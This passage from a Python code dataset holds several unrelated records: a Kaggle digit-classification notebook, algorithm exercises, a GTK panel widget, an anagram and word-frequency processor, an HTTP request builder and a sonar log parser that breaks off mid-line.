InlineBackend.figure_formats = {'pdf',}\nget_ipython().magic('matplotlib inline')\n\n\n# On charge les données\n\n# In[4]:\n\ndata=pd.read_csv(\"/Users/philippinejamet/Desktop/Adrien/Kaggle_digit/train.csv\")\nprint('format données:', data.shape)\n\n\n# In[5]:\n\nX=data.iloc[:,1:]\ny=data.iloc[:,0]\n\n\n# In[10]:\n\nX_train, X_CV, y_train, y_CV = train_test_split(X, y, test_size=0.2, random_state=0)\nprint('taille des données:',X.shape, y.shape,'entrainement:', X_train.shape, y_train.shape,'cv:',X_CV.shape, y_CV.shape)\n\n\n# In[11]:\n\ntest=pd.read_csv(\"/Users/philippinejamet/Desktop/Adrien/Kaggle_digit/test.csv\")\nprint('taille des donnnes test', test.shape)\n\n\n# # Regression logistique\n\n# In[ ]:\n\nRegLogistique= sk.linear_model.LogisticRegression()\nRegLogistique.fit(X_train,y_train)\n\ny_predict_logit=RegLogistique.predict(test)\n\n\n \n\n\n# In[ ]:\n\nprint('score sur données entrainement', RegLogistique.score(X=X_train,y=y_train))\nprint('score sur les données de validation', RegLogistique.score(X=X_CV,y=y_CV))\n\n\n\n# # KNN\n\n# In[ ]:\n\n# On choisit notre paramètre k\n\ndata.shape\ndata.shape[0]\nsample = np.random.randint(data.shape[0], size=5000)\nsample\ndata_sample=data.iloc[sample,:]\n\n\nX_sample=data_sample.iloc[:,1:]\ny_sample=data_sample.iloc[:,0]\n\n\n# In[10]:\n\nX_sample_train, X_sample_CV, y_sample_train, y_sample_CV = train_test_split(X_sample, y_sample, test_size=0.2, random_state=0)\n\n\n\n\n\nerrors = []\nfor k in range(2,15):\n knn = neighbors.KNeighborsClassifier(k)\n errors.append(100*(1 - knn.fit(X_train, y_train).score(X_CV, y_CV)))\nplt.plot(range(2,15), errors, 'o-')\nplt.show()\n\n\n# On choisit k=7\n\n# In[ ]:\n\n#knn = neighbors.KNeighborsClassifier(6)\n#knn.fit(X_sample_train,y_sample_train)\n#knn.score(X_sample_train,y_sample_train)\n#knn.score(X_sample_CV,y_sample_CV)\n#y_predict_knn=knn.predict(test)\n\n\nknn = neighbors.KNeighborsClassifier(6)\nknn.fit(X,y)\n#knn.score(X_sample_train,y_sample_train)\n#knn.score(X_sample_CV,y_sample_CV)\n\ny_predict_knn=knn.predict(test)\n\n\n\n# # SUBMISSION\n\n# In[ ]:\n\nImageId=np.arange(1,28001)\nImageId=pd.DataFrame(ImageId)\nImageId.columns=[\"ImageId\"]\n\n\n#regression logistique\n\ny_predict_logit=pd.DataFrame(y_predict_logit)\ny_predict_logit.columns=[\"label\"]\nsubmission_logit=pd.concat([ImageId,y_predict_logit],axis=1)\npd.DataFrame.to_csv(submission_logit,\"/Users/philippinejamet/Desktop/Adrien/Kaggle_digit/submission_logit.csv\",sep=',',index=0)\n\n#KNN\n\ny_predict_knn=pd.DataFrame(y_predict_knn)\ny_predict_knn.columns=[\"label\"]\nsubmission_knn=pd.concat([ImageId,y_predict_knn],axis=1)\npd.DataFrame.to_csv(submission_knn,\"/Users/philippinejamet/Desktop/Adrien/Kaggle_digit/submission_knn6.csv\",sep=',',index=0)\n\n\n\n","sub_path":"Kaggle_digit.py","file_name":"Kaggle_digit.py","file_ext":"py","file_size_in_byte":2969,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"333442514","text":"# https://programmers.co.kr/learn/courses/30/lessons/42584?language=python3\ndef solution(prices):\n n = len(prices)\n answer = [1] * (n - 1) + [0]\n for i in range(n - 1):\n j = i\n while j < n - 1:\n j += 1\n if prices[i] > prices[j]:\n break\n answer[i] = j - i\n return answer\n","sub_path":"programmers/laern/stack&queue6.py","file_name":"stack&queue6.py","file_ext":"py","file_size_in_byte":340,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"525234661","text":"import sys\nfrom math import log, 
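The stock-price record above answers "how long until the price drops" with a nested scan, which is O(n^2). A stack of indices still waiting for a drop brings it to O(n); a sketch with the same input/output contract as the original solution:

def solution(prices):
    n = len(prices)
    answer = [0] * n
    stack = []  # indices whose price has not dropped yet
    for j in range(n):
        while stack and prices[stack[-1]] > prices[j]:
            i = stack.pop()
            answer[i] = j - i       # price dropped at second j
        stack.append(j)
    while stack:                    # never dropped: valid until the end
        i = stack.pop()
        answer[i] = n - 1 - i
    return answer

print(solution([1, 2, 3, 2, 3]))  # [4, 3, 1, 1, 0]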
ceil\nread=lambda:sys.stdin.readline().rstrip()\nreadi=lambda:int(sys.stdin.readline())\nwriteln=lambda x:sys.stdout.write(str(x)+\"\\n\")\nwrite=lambda x:sys.stdout.write(x)\nlog2=lambda x:log(x, 2)\niceil=lambda x:int(ceil(x))\ndef init(arr, tree, node, start, end, op=lambda x,y: x+y):\n    if start == end:\n        tree[node] = arr[start]\n        return tree[node]\n    else:\n        mid = (start + end) >> 1\n        _a = init(arr, tree, node*2, start, mid, op)\n        _b = init(arr, tree, node*2+1, mid+1, end, op)\n        tree[node] = op(_a, _b)\n        return tree[node]\n\ndef segOp(tree, node, start, end, left, right, iv=0, op=lambda x,y:x+y):\n    if left > end or right < start:\n        return iv \n    if left <= start and end <= right:\n        return tree[node]\n    mid = (start + end) >> 1\n    _a = segOp(tree, node*2, start, mid, left, right, iv, op)\n    _b = segOp(tree, node*2 + 1, mid + 1, end, left, right, iv, op)\n    return op(_a, _b)\n\nN,M=map(int, read().split())\na=[0]*N\nh=iceil(log2(N))\ntsize = 1 << (h+1)\ntree = [0]*tsize\nfor i in range(N):\n    a[i] = readi()\ninit(a, tree, 1, 0, N-1, lambda x, y: x if x <= y else y)\nwhile M:\n    t1,t2=map(int, read().split())\n    writeln(segOp(tree, 1, 0, N-1, t1-1, t2-1, iv=1e300, op=lambda x, y: x if x < y else y))\n    M -= 1","sub_path":"segment_tree/segment_min_10868.py","file_name":"segment_min_10868.py","file_ext":"py","file_size_in_byte":1312,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"273229793","text":"#!/usr/bin/env python3\n\nfrom nwg_panel.tools import check_key\nimport gi\n\ngi.require_version('Gtk', '3.0')\ngi.require_version('Gdk', '3.0')\n\nfrom gi.repository import Gtk\n\n\nclass DwlTags(Gtk.EventBox):\n    def __init__(self, output, settings):\n        Gtk.EventBox.__init__(self)\n        check_key(settings, \"tag-names\", \"1 2 3 4 5 6 7 8 9\")\n        check_key(settings, \"title-limit\", 55)\n        check_key(settings, \"angle\", 0.0)  # settings, not self.settings: self.settings is only assigned below\n\n        self.output = output\n        self.settings = settings\n\n        names = self.settings[\"tag-names\"].split()\n        self.tags = names if len(names) == 9 else [\"1\", \"2\", \"3\", \"4\", \"5\", \"6\", \"7\", \"8\", \"9\"]\n\n        self.byte_dict = {1: 1, 2: 2, 3: 4, 4: 8, 5: 16, 6: 32, 7: 64, 8: 128, 9: 256}\n\n        self.box = Gtk.Box(orientation=Gtk.Orientation.HORIZONTAL, spacing=0)\n        if self.settings[\"angle\"] != 0.0:\n            self.box.set_orientation(Gtk.Orientation.VERTICAL)\n        self.add(self.box)\n        self.label = Gtk.Label()\n        if self.settings[\"angle\"] != 0.0:\n            self.label.set_angle(self.settings[\"angle\"])\n        self.tag_box = Gtk.Box(orientation=Gtk.Orientation.HORIZONTAL, spacing=5)\n        if self.settings[\"angle\"] != 0.0:\n            self.tag_box.set_orientation(Gtk.Orientation.VERTICAL)\n        self.box.pack_end(self.label, False, False, 4)\n        self.show_all()\n\n    def refresh(self, dwl_data):\n        if dwl_data:\n            try:\n                data = dwl_data[self.output]\n                tags_string = data[\"tags\"]\n                tags = tags_string.split()\n                non_empty_output_tags = int(tags[0])\n                selected_output_tag = int(tags[1])\n                current_win_on_output_tags = int(tags[2])\n                urgent_tags = int(tags[3])\n\n                if self.tag_box:\n                    self.tag_box.destroy()\n                self.tag_box = Gtk.Box(orientation=Gtk.Orientation.HORIZONTAL, spacing=0)\n                if self.settings[\"angle\"] != 0.0:\n                    self.tag_box.set_orientation(Gtk.Orientation.VERTICAL)\n                self.tag_box.set_property('name', 'dwl-tag-box')\n                self.box.pack_start(self.tag_box, False, False, 4)\n\n                cnt = 1\n                win_on_tags = []\n                for item in self.tags:\n                    tag_wrapper = Gtk.Box(orientation=Gtk.Orientation.HORIZONTAL, spacing=0)\n                    if self.settings[\"angle\"] != 0.0:\n                        
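init and segOp in the segment-tree record above are generic over the combining operator; the record instantiates them for range minimum with iv=1e300 as the identity. Switching the operator and identity turns the same pair into a range-sum tree. A short usage sketch, assuming the init/segOp definitions from that record are in scope:

arr = [5, 2, 8, 1]
n = len(arr)
tree = [0] * (4 * n)                   # 4*n is always a safe size bound
init(arr, tree, 1, 0, n - 1)           # default op is addition
print(segOp(tree, 1, 0, n - 1, 1, 2))  # sum of arr[1..2] -> 10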
tag_wrapper.set_orientation(Gtk.Orientation.VERTICAL)\n label = Gtk.Label()\n if self.settings[\"angle\"] != 0.0:\n label.set_angle(self.settings[\"angle\"])\n tag_wrapper.pack_start(label, False, False, 0)\n if self.byte_dict[cnt] == selected_output_tag:\n tag_wrapper.set_property('name', \"dwl-tag-selected\")\n self.tag_box.pack_start(tag_wrapper, False, False, 1)\n label.set_text(item)\n\n if self.byte_dict[cnt] & non_empty_output_tags != 0:\n label.set_property('name', \"dwl-tag-occupied\")\n else:\n label.set_property('name', \"dwl-tag-free\")\n\n if self.byte_dict[cnt] & urgent_tags != 0:\n label.set_property('name', \"dwl-tag-urgent\")\n\n if self.byte_dict[cnt] & current_win_on_output_tags != 0:\n win_on_tags.append(str(cnt))\n\n cnt += 1\n self.tag_box.show_all()\n\n layout = data[\"layout\"]\n\n title = data[\"title\"]\n if len(title) > self.settings[\"title-limit\"]:\n title = title[:self.settings[\"title-limit\"] - 1]\n\n # title suffix to add if win present on more than 1 tag\n s = \", \".join(win_on_tags) if len(win_on_tags) > 1 else \"\"\n if s:\n title = \"{} ({})\".format(title, s)\n\n # selmon = data[\"selmon\"] == \"1\"\n # print(\"{} {} {}\".format(tags_string, layout, title))\n self.label.set_text(\"{} {}\".format(layout, title))\n except KeyError:\n print(\"No data found for output {}\".format(self.output))\n","sub_path":"nwg_panel/modules/dwl_tags.py","file_name":"dwl_tags.py","file_ext":"py","file_size_in_byte":4304,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"345643964","text":"'''\nCreated on 16-Jan-2016\n\n@author: harun\n'''\nimport re\nimport operator\nimport time\nimport nltk\nfrom itertools import permutations\nfrom nltk.corpus import words\nfrom nltk.corpus import wordnet\nfrom __builtin__ import file\nfrom numpy.core.fromnumeric import put\nfrom curses.ascii import isalnum\nfrom collections import OrderedDict\n\ntokenFile=\"test.tokens\" # the name of the file you wish to process\nanagramsFile=\"anagrams.anagrams\"\nnltkAnagramsFile=\"nltkAnagrams.anagrams\"\nenglishWordFile=\"/usr/share/dict/words\"\nenglishWords=set()\nmaxLength=25 # the longest word in NLTK library is of length 24\nhashMap=dict()\nnltkHashMap=dict()\nanagrams=dict()\n\ndef loadNLTKAnagrams():\n print(\"Loading Anagrams...\")\n stime=time.time()\n file=open(nltkAnagramsFile,\"r\")\n for line in file:\n words=re.split('[^a-zA-Z0-9]',line)\n n=len(words)\n key=words[0]\n l=set()\n for i in xrange(3,n):\n if words[i]!='set' and words[i]!='' and words[i]!='u':\n l.add(words[i])\n anagrams[key]=filter(None,l)\n file.close()\n print(\"Anagrams loaded: %d\"%len(anagrams))\n print(\"Time taken to load anagrams: %s\"%(time.time()-stime))\n \ndef precomputeFromNLTK():\n '''\n precompute with nltk's corpus as wordbase\n '''\n language=set()\n print(len(words.words()))\n for word in words.words():\n word=word.lower()\n sortW=''.join(char for char in sorted(word))\n if sortW[0]>='a' and sortW[0]<='z':\n word=word+\":\"+sortW\n language.add(word)\n print(\"Loaded %d words from NLTK wordnet\"%(len(language)))\n buckets=[set() for x in xrange(25)]\n for word in language:\n buckets[len(word)/2].add(word)\n count=0\n for word in language:\n if count%1000==0:\n print(\"Done for %d words\"%count)\n count+=1\n sortedW=word.split(\":\")[1]\n if sortedW not in nltkHashMap:\n nltkHashMap[sortedW]=set()\n for word2 in buckets[len(sortedW)]:\n sortedW2=word2.split(\":\")[1]\n if(sortedW==sortedW2):\n nltkHashMap[sortedW].add(word2.split(\":\")[0])\n 
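byte_dict in the dwl-tags record above is just a table of one-hot masks, so tests like byte_dict[cnt] & selected_output_tag are plain bit tests and can be written with a shift:

selected = 0b000010100          # example bitmask: tags 3 and 5 selected
for tag in range(1, 10):
    mask = 1 << (tag - 1)       # same values as byte_dict: 1, 2, 4, ..., 256
    if selected & mask:
        print("tag", tag, "is selected")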
file=open(nltkAnagramsFile,\"w\")\n file.truncate()\n count=0\n for anagrams, listOfAnagrams in nltkHashMap.items():\n if count%1000==0:\n print(\"%d anagram lists written\"%count)\n file.flush()\n count+=1\n file.write(\"%s:%s\\n\"%(anagrams, listOfAnagrams))\n file.close()\n print(\"Precomputation with NLTK done\")\n\ndef precompute():\n '''\n precomputes anagrams with /usr/share/dict/words as wordbase\n '''\n starttime=time.time()\n file=open(englishWordFile, \"r\")\n # load all english words\n for line in file:\n line=line[:-1]\n line=line.lower()\n sortL=''.join(char for char in sorted(line))\n put=line+\":\"+sortL\n englishWords.add(put)\n print(\"Loaded words %d\"%len(englishWords))\n buckets=[set() for x in xrange(25)]\n for word in englishWords:\n buckets[len(word)/2].add(word)\n for i in xrange(maxLength):\n print(\"%d: %d\"%(i, len(buckets[i])))\n count=0\n for word in englishWords:\n if count%1000==0:\n print(\"Done for %d words\"%count)\n print(\"Took %s seconds\"%(time.time()-starttime))\n count+=1\n sortedWord = word.split(\":\")[1]\n if not isalnum(sortedWord[0]):\n continue\n if sortedWord not in hashMap:\n hashMap[sortedWord]=set()\n for word2 in buckets[len(sortedWord)]:\n sortedWord2=word2.split(\":\")[1]\n if sortedWord==sortedWord2:\n hashMap[sortedWord].add(word2.split(\":\")[0])\n anag=open(anagramsFile, \"w\")\n anag.truncate()\n count=0\n for anagram,listOfAnagrams in hashMap.items():\n if count%100==0:\n print(\"%d lists written\"%(count))\n anag.flush()\n count+=1\n anag.write(\"%s:%s\\n\"%(anagram,listOfAnagrams))\n anag.close()\n print(\"Precomputation done\")\n\ndef loadAnagrams():\n print(\"Loading Anagrams...\")\n stime=time.time()\n file=open(anagramsFile,\"r\")\n for line in file:\n words=re.split('[^a-zA-Z0-9]',line)\n n=len(words)\n key=words[0]\n l=set()\n for i in xrange(2,n):\n l.add(words[i])\n anagrams[key]=filter(None,l)\n file.close()\n print(\"Anagrams loaded: %d\"%len(anagrams))\n print(\"Time taken: %s\"%(time.time()-stime))\n\ndef detectAnagrams(tokens):\n '''\n input: list of tokens\n output: None\n return: Dict of <token, Set<anagram>> pairs\n '''\n tokens.sort()\n tokAnag=OrderedDict()\n for token in tokens:\n token=token.lower()\n tokenCopy=''.join(char for char in token)\n token=''.join(char for char in sorted(token))\n if tokenCopy in tokAnag:\n continue\n if token in anagrams:\n tokAnag[tokenCopy]=set(anagrams[token])\n else:\n tokAnag[tokenCopy]=set()\n return tokAnag\n\ndef printAnagrams(angs):\n print(\"The anagrams are:\")\n for key, val in angs.items():\n print(\"%s: %s\"%(key, val))\n\ndef computeThreeGramFrequencies(tokens):\n '''\n input: list of tokens\n output: None\n return: dictionary of <3grams, count> mappings\n '''\n n=len(tokens)\n threeGramFrequency=dict()\n for index in xrange(n-2):\n threeGram=tokens[index].lower()+\",\"+tokens[index+1].lower()+\",\"+tokens[index+2].lower()\n if threeGram in threeGramFrequency:\n threeGramFrequency[threeGram]+=1\n else:\n threeGramFrequency[threeGram]=1\n return threeGramFrequency\n \ndef printThreeGramFrequencies(frequencies):\n '''\n input: dictionary of <3grams, count> mappings\n output: prints the dictionary sorted on values\n returns: None\n '''\n sortedFreq = sorted(frequencies.items(), key=operator.itemgetter(1))\n for ngrams in reversed(sortedFreq):\n print(ngrams)\n \ndef countWordFrequencies(tokens):\n '''\n input: list of tokens\n output: None\n return: dictionary of <token, count> mappings\n '''\n frequencies=dict()\n for token in tokens:\n token=token.lower()\n if 
frequencies.has_key(token):\n frequencies[token]=frequencies[token]+1\n else:\n frequencies[token]=1\n return frequencies\n \ndef printWordFrequencies(frequencies):\n '''\n input: dictionary of <token, count> mappings\n output: prints the dictionary sorted on values\n return: None\n '''\n sortedFrequencies=sorted(frequencies.items(), key=operator.itemgetter(1))\n print(\"The word frequencies are:\")\n cnt=1\n for count in reversed(sortedFrequencies):\n print(count)\n cnt+=1\n if cnt > 10:\n break\n \ndef tokenizeFile():\n '''\n input: None\n output: None\n return: list of tokens\n '''\n tokens=[]\n file=open(tokenFile,'r')\n if not file:\n print(\"File not found\")\n else:\n print(\"File opened\")\n for line in file:\n words=re.split('[^a-zA-Z0-9]',line)\n words=filter(None, words)\n for w in words:\n tokens.append(w)\n return tokens\ndef printTokens(tokens):\n print(\"The tokens in the file are:\")\n for token in tokens:\n print(token)\n\nif __name__ == '__main__':\n starttime = time.time()\n# uncomment the next line in case you want to precompute\n# precompute()\n toks=tokenizeFile()\n# printTokens(toks)\n freq=countWordFrequencies(toks)\n printWordFrequencies(freq)\n# ngrams=computeThreeGramFrequencies(toks)\n# printThreeGramFrequencies(ngrams)\n# loadAnagrams()\n# anags=detectAnagrams(toks)\n# printAnagrams(anags)\n# uncomment the following line to precompute from NLTK library\n# precomputeFromNLTK()\n loadNLTKAnagrams()\n anags=detectAnagrams(toks)\n printAnagrams(anags)\n# file=open(nltkAnagramsFile,\"r\")\n# line=file.readline()\n# print(filter(None,re.split('[^a-zA-Z0-9]', line)))\n print(\"Time taken for %d tokens: %s seconds\"%(len(toks),time.time()-starttime))\n","sub_path":"src/TextProcessor.py","file_name":"TextProcessor.py","file_ext":"py","file_size_in_byte":8065,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"454092965","text":"class HttpRequest:\n\n def __init__(self, host: str, port: int, type: str, path: str,\n headers: dict = None, data: str = None, version: str = 'HTTP/1.0'):\n if headers is None:\n headers = {}\n self.host = host\n self.port = port\n self.type = type\n self.path = path\n self.headers = headers\n self.data = data\n self.version = version\n\n def get_request_line(self):\n return f'{self.type} {self.path} {self.version}'\n\n def stringify_headers(self):\n return '\\r\\n'.join(f'{key}: {value}' for key, value in self.headers.items())\n\n def __repr__(self):\n build = [self.get_request_line()]\n\n if len(self.headers) != 0:\n build.append(self.stringify_headers())\n\n if self.data is not None:\n build.append('')\n build.append(self.data)\n\n return '\\r\\n'.join(build) + '\\r\\n\\r\\n'\n","sub_path":"assignment-3/tcp-protocol/src/httpclient/http/HttpRequest.py","file_name":"HttpRequest.py","file_ext":"py","file_size_in_byte":923,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"288531315","text":"#!/usr/bin/env python\n# coding=utf-8\n\nimport inspect\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport re\nimport sys\n\nSTART_MOVE_CONTINUE_NUM = 5\nEND_MOVE_CONTINUE_NUM = 5\n\n\ndef lineno():\n \"\"\"Returns the current line number in our program.\"\"\"\n return inspect.currentframe().f_back.f_lineno\n\ndef roundPartial(value, resolution):\n return round(value / resolution) * resolution\n\ndef loadradar(filename):\n # frame_num_0 = 0\n # frame_num_1 = 0\n # frame_num_2 = 0\n # frame_num_3 = 0\n # frame_num_4 = 0\n # frame_num_5 = 0\n # 
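Both precompute passes in the anagram record above compare every word against its whole same-length bucket, which is quadratic in the bucket size. Grouping words by their sorted-letters key in one pass builds the same index directly; a sketch on an invented word list:

from collections import defaultdict

words = ["listen", "silent", "enlist", "google", "banana"]
groups = defaultdict(set)
for w in words:
    groups["".join(sorted(w.lower()))].add(w.lower())

print(groups["".join(sorted("listen"))])  # {'listen', 'silent', 'enlist'}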
frame_num_6 = 0\n # frame_num_7 = 0\n cnt_ffff_0 = 0\n cnt_ffff_1 = 0\n cnt_ffff_2 = 0\n cnt_ffff_3 = 0\n cnt_ffff_4 = 0\n cnt_ffff_5 = 0\n cnt_ffff_6 = 0\n cnt_ffff_7 = 0\n ran_ori_0 = []\n ran_ori_1 = []\n ran_ori_2 = []\n ran_ori_3 = []\n ran_ori_4 = []\n ran_ori_5 = []\n ran_ori_6 = []\n ran_ori_7 = []\n range_0 = []\n range_1 = []\n range_2 = []\n range_3 = []\n range_4 = []\n range_5 = []\n range_6 = []\n range_7 = []\n last_timestamp_val_0 = -1.0\n last_timestamp_val_1 = -1.0\n last_timestamp_val_2 = -1.0\n last_timestamp_val_3 = -1.0\n last_timestamp_val_4 = -1.0\n last_timestamp_val_5 = -1.0\n last_timestamp_val_6 = -1.0\n last_timestamp_val_7 = -1.0\n timestamp_0 = []\n timestamp_1 = []\n timestamp_2 = []\n timestamp_3 = []\n timestamp_4 = []\n timestamp_5 = []\n timestamp_6 = []\n timestamp_7 = []\n linux_timestamp_0 = []\n sonar_IDs = [0, 1, 2, 3, 4, 5, 6, 7]\n with open(filename) as myfile:\n with open('filter_sonar.txt', 'w+') as filter_file:\n for line in myfile:\n line = line[:-1] # deletes extra line\n for aa in sonar_IDs:\n if re.search(\"sonar_obj\" + str(aa), line, re.IGNORECASE):\n name, var = line.partition(\"Range: \")[::2]\n range_item = var.split(\" \")[0]\n try:\n range_val = float(range_item)\n except:\n print(\"BAD range: \" + range_item + \" bad\")\n name, var = line.partition(\"timestamp: \")[::2]\n timestamp_item = var.split(\" \")[0]\n try:\n timestamp_val = float(timestamp_item)\n except:\n print(\"BAD timestamp: \" + timestamp_item + \" bad\")\n\n range_valid = False \n if range_val >= 0 and range_val < 60000:\n range_valid = True \n range_val = 0.001 * range_val\n\n if 0 == aa:\n diff_timestamp_0 = timestamp_val - last_timestamp_val_0\n if last_timestamp_val_0 >= 0.0 and 0 == diff_timestamp_0:\n continue\n ## print(\"frame_num_0: \" + str(frame_num_0) + \", timestamp_val_0: \" + str(timestamp_val_0) + \", last_timestamp_val_0: \" + str(last_timestamp_val_0))\n last_timestamp_val_0 = timestamp_val\n \n timestamp_0.append(timestamp_val)\n ran_ori_0.append(range_val)\n if range_valid:\n range_0.append(range_val)\n else:\n cnt_ffff_0 += 1\n elif 1 == aa:\n diff_timestamp_1 = timestamp_val - last_timestamp_val_1\n if last_timestamp_val_1 >= 0.0 and 0 == diff_timestamp_1:\n continue\n ## print(\"frame_num_0: \" + str(frame_num_0) + \", timestamp_val_0: \" + str(timestamp_val_0) + \", last_timestamp_val_0: \" + str(last_timestamp_val_0))\n last_timestamp_val_1 = timestamp_val\n\n timestamp_1.append(timestamp_val)\n ran_ori_1.append(range_val)\n if range_valid:\n range_1.append(range_val)\n else:\n cnt_ffff_1 += 1\n elif 2 == aa:\n diff_timestamp_2 = timestamp_val - last_timestamp_val_2\n if last_timestamp_val_2 >= 0.0 and 0 == diff_timestamp_2:\n continue\n ## print(\"frame_num_0: \" + str(frame_num_0) + \", timestamp_val_0: \" + str(timestamp_val_0) + \", last_timestamp_val_0: \" + str(last_timestamp_val_0))\n last_timestamp_val_2 = timestamp_val\n\n timestamp_2.append(timestamp_val)\n ran_ori_2.append(range_val)\n if range_valid:\n range_2.append(range_val)\n else:\n cnt_ffff_2 += 1\n elif 3 == aa:\n diff_timestamp_3 = timestamp_val - last_timestamp_val_3\n if last_timestamp_val_3 >= 0.0 and 0 == diff_timestamp_3:\n continue\n ## print(\"frame_num_0: \" + str(frame_num_0) + \", timestamp_val_0: \" + str(timestamp_val_0) + \", last_timestamp_val_0: \" + str(last_timestamp_val_0))\n last_timestamp_val_3 = timestamp_val\n\n timestamp_3.append(timestamp_val)\n ran_ori_3.append(range_val)\n if range_valid:\n range_3.append(range_val)\n else:\n cnt_ffff_3 += 1\n 
elif 4 == aa:\n diff_timestamp_4 = timestamp_val - last_timestamp_val_4\n if last_timestamp_val_4 >= 0.0 and 0 == diff_timestamp_4:\n continue\n ## print(\"frame_num_0: \" + str(frame_num_0) + \", timestamp_val_0: \" + str(timestamp_val_0) + \", last_timestamp_val_0: \" + str(last_timestamp_val_0))\n last_timestamp_val_4 = timestamp_val\n\n timestamp_4.append(timestamp_val)\n ran_ori_4.append(range_val)\n if range_valid:\n range_4.append(range_val)\n else:\n cnt_ffff_4 += 1\n elif 5 == aa:\n diff_timestamp_5 = timestamp_val - last_timestamp_val_5\n if last_timestamp_val_5 >= 0.0 and 0 == diff_timestamp_5:\n continue\n ## print(\"frame_num_0: \" + str(frame_num_0) + \", timestamp_val_0: \" + str(timestamp_val_0) + \", last_timestamp_val_0: \" + str(last_timestamp_val_0))\n last_timestamp_val_5 = timestamp_val\n\n timestamp_5.append(timestamp_val)\n ran_ori_5.append(range_val)\n if range_valid:\n range_5.append(range_val)\n else:\n cnt_ffff_5 += 1\n elif 6 == aa:\n diff_timestamp_6 = timestamp_val - last_timestamp_val_6\n if last_timestamp_val_6 >= 0.0 and 0 == diff_timestamp_6:\n continue\n ## print(\"frame_num_0: \" + str(frame_num_0) + \", timestamp_val_0: \" + str(timestamp_val_0) + \", last_timestamp_val_0: \" + str(last_timestamp_val_0))\n last_timestamp_val_6 = timestamp_val\n\n timestamp_6.append(timestamp_val)\n ran_ori_6.append(range_val)\n if range_valid:\n range_6.append(range_val)\n else:\n cnt_ffff_6 += 1\n elif 7 == aa:\n diff_timestamp_7 = timestamp_val - last_timestamp_val_7\n if last_timestamp_val_7 >= 0.0 and 0 == diff_timestamp_7:\n continue\n ## print(\"frame_num_0: \" + str(frame_num_0) + \", timestamp_val_0: \" + str(timestamp_val_0) + \", last_timestamp_val_0: \" + str(last_timestamp_val_0))\n last_timestamp_val_7 = timestamp_val\n\n timestamp_7.append(timestamp_val)\n ran_ori_7.append(range_val)\n if range_valid:\n range_7.append(range_val)\n else:\n cnt_ffff_7 += 1\n\n print(\"cnt_0: \" + str(cnt_ffff_0)\n + \"\\ncnt_1: \" + str(cnt_ffff_1)\n + \"\\ncnt_2: \" + str(cnt_ffff_2)\n + \"\\ncnt_3: \" + str(cnt_ffff_3)\n + \"\\ncnt_4: \" + str(cnt_ffff_4)\n + \"\\ncnt_5: \" + str(cnt_ffff_5)\n + \"\\ncnt_6: \" + str(cnt_ffff_6)\n + \"\\ncnt_7: \" + str(cnt_ffff_7)\n )\n return range_0, ran_ori_0, timestamp_0, range_1, ran_ori_1, timestamp_1, range_2, ran_ori_2, timestamp_2, range_3, ran_ori_3, timestamp_3, range_4, ran_ori_4, timestamp_4, range_5, ran_ori_5, timestamp_5, range_6, ran_ori_6, timestamp_6, range_7, ran_ori_7, timestamp_7\n\nif __name__ == \"__main__\":\n if len(sys.argv) == 2:\n # frame_NO_0, range_0, timestamp_0, range_start_0, timestamp_start_0, range_end_0, timestamp_end_0, frame_NO_1, range_valid_1, timestamp_1, range_start_1, timestamp_start_1, range_end_1, timestamp_end_1 = loadradar(sys.argv[1])\n # frame_NO_0, range_0, timestamp_0 = loadradar(sys.argv[1])\n range_0, ran_ori_0, ts_0, range_1, ran_ori_1, ts_1, range_2, ran_ori_2, ts_2, range_3, ran_ori_3, ts_3, range_4, ran_ori_4, ts_4, range_5, ran_ori_5, ts_5, range_6, ran_ori_6, ts_6, range_7, ran_ori_7, ts_7 = loadradar(sys.argv[1])\n CNT_F_0 = len(ran_ori_0) - len(range_0)\n CNT_F_1 = len(ran_ori_1) - len(range_1)\n CNT_F_2 = len(ran_ori_2) - len(range_2)\n CNT_F_3 = len(ran_ori_3) - len(range_3)\n CNT_F_4 = len(ran_ori_4) - len(range_4)\n CNT_F_5 = len(ran_ori_5) - len(range_5)\n CNT_F_6 = len(ran_ori_6) - len(range_6)\n CNT_F_7 = len(ran_ori_7) - len(range_7)\n print(\"len_ran_ori_0: \" + str(len(ran_ori_0)) + \", len_ts_0: \" + str(len(ts_0)) + \", len_CNT_F_0: \" + str(CNT_F_0))\n 
print(\"len_ran_ori_1: \" + str(len(ran_ori_1)) + \", len_ts_1: \" + str(len(ts_1)) + \", len_CNT_F_1: \" + str(CNT_F_1))\n print(\"len_ran_ori_2: \" + str(len(ran_ori_2)) + \", len_ts_2: \" + str(len(ts_2)) + \", len_CNT_F_2: \" + str(CNT_F_2))\n print(\"len_ran_ori_3: \" + str(len(ran_ori_3)) + \", len_ts_3: \" + str(len(ts_3)) + \", len_CNT_F_3: \" + str(CNT_F_3))\n print(\"len_ran_ori_4: \" + str(len(ran_ori_4)) + \", len_ts_4: \" + str(len(ts_4)) + \", len_CNT_F_4: \" + str(CNT_F_4))\n print(\"len_ran_ori_5: \" + str(len(ran_ori_5)) + \", len_ts_5: \" + str(len(ts_5)) + \", len_CNT_F_5: \" + str(CNT_F_5))\n print(\"len_ran_ori_6: \" + str(len(ran_ori_6)) + \", len_ts_6: \" + str(len(ts_6)) + \", len_CNT_F_6: \" + str(CNT_F_6))\n print(\"len_ran_ori_7: \" + str(len(ran_ori_7)) + \", len_ts_7: \" + str(len(ts_7)) + \", len_CNT_F_7: \" + str(CNT_F_7))\n ## print(timestamp_0)\n dt_0 = np.diff(ts_0)\n dt_1 = np.diff(ts_1)\n dt_2 = np.diff(ts_2)\n dt_3 = np.diff(ts_3)\n dt_4 = np.diff(ts_4)\n dt_5 = np.diff(ts_5)\n dt_6 = np.diff(ts_6)\n dt_7 = np.diff(ts_7)\n print(\"dt_0_len: \" + str(len(dt_0)) + \"\\n\"\n + \"dt_1_len: \" + str(len(dt_1)) + \"\\n\"\n + \"dt_2_len: \" + str(len(dt_2)) + \"\\n\"\n + \"dt_3_len: \" + str(len(dt_3)) + \"\\n\"\n + \"dt_4_len: \" + str(len(dt_4)) + \"\\n\"\n + \"dt_5_len: \" + str(len(dt_5)) + \"\\n\"\n 